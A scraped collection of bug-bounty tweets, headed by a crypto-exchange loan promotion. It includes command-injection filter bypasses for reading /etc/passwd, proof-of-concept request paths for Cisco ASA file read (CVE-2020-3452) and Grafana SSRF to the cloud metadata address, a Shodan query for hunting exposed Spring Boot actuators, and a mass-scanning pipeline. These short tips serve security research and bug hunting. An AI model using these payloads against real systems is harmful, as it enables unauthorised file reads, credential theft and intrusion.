🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

Command injection 💥 Filter Bypasses > 1/3 cat /etc/passwd cat /e"t"c/pa"s"swd cat /'e'tc/pa's' swd cat /etc/pa??wd cat /etc/pa*wd cat /et' 'c/passw' 'd cat /et$()c/pa$()$swd #bugbountytips #shieldindia #commandinjection

SQL Injection in Email Address (username) - by Dimaz Arno Tips: "injection_here"[at]email[dot]com Bypassing Email Filter which leads to SQL Injection: medium.com/@dimazarno/byp…

org:YOUR_TARGET http.favicon.hash:116323821 Use this query on Shodan to find Spring Boot servers. Then check for exposed actuators. If /env is available you can probably achieve RCE. If /heapdump is accessible you may find private keys and tokens. #bugbountytips

I found a lot SSRF issues via inject headers (like x-forwarded-host,..etc) with this tool: github.com/m4ll0k/Bug-Bou… Hussein Daher Jason Haddix TomNomNom STÖK ✌️ Ben Sadeghipour Yassine Aboukir 🐐 #bugbountytips #bugbountytip #ssrf #python

I just reported an RCE via OOB. #infosec #LetsShareOurKnowledge

OAuth in one picture.

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking!

GraphQL — Common vulnerabilities & how to exploit them: link.medium.com/oiEg6EG6v5 Understanding Graphql : hackernoon.com/understanding-… Some good graphql stuff (Not by me) #bugbountytips #bugbountytips

Awesome Tip By Intigriti And Tool By Tarun mahour #bugbountytips #bugbountytip #bugbounty

Check out Justin Gardner's blog post on CVE-2020-13379: Unauthenticated SSRF in Grafana! rhynorater.github.io/CVE-2020-13379… POC: /avatar/tesdt%3Fd=redirect.rhynorater.com%25253f%253b%https://t.co/tpG2O3i9Bj%252f169.254.169.254

Web Cache Entanglement: Novel Pathways to Poisoning by James Kettle #BHUSA portswigger.net/research/web-c…

👑 How did I find a critical today? well as i said it was very simple, using shodan and jaeles. 🔥shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ 🔥 @zeroc00I j3ssie (Ai Ho) #bugbountytip #KingOfBugBountyTips

Excited to share my latest research! h2c smuggling: request smuggling via HTTP/2 cleartext. Leveraging TCP tunnels provided by HTTP/1.1 upgrades, we can initiate h2c connections directly with compatible back-end services, bypassing proxy access controls. labs.bishopfox.com/tech-blog/h2c-…

Many companies send data via POST data (json), I found a lot bugs like Request Arbitrary Path (IDORs), LFI, CRLF,… Example:

Leveled up to 0x05! via Synack Red Team 🙂

Found this pic of me as a child

Things are heating up!🔥 Only 3 days left for #IWCon2022. Booked your tickets yet? Check out speakers and reserve your slot today: iwcon.live #infosec #hacking #bugbounty

The Dirty Pipe Vulnerability : Allows Write Access with Root Privileges (affects all Linux machines running kernel version since 5.8) : dirtypipe.cm4all.com PoC : haxx.in/files/dirtypip…

Sharpener v1.09 is out. It is a must have extension for serious Burp users IMHO before its major UI revamp anyway. I don't know about you, but I cannot Burp properly without it!!! github.com/mdsecresearch/… #BurpSuite #MDSec #Extension #AppSec MDSec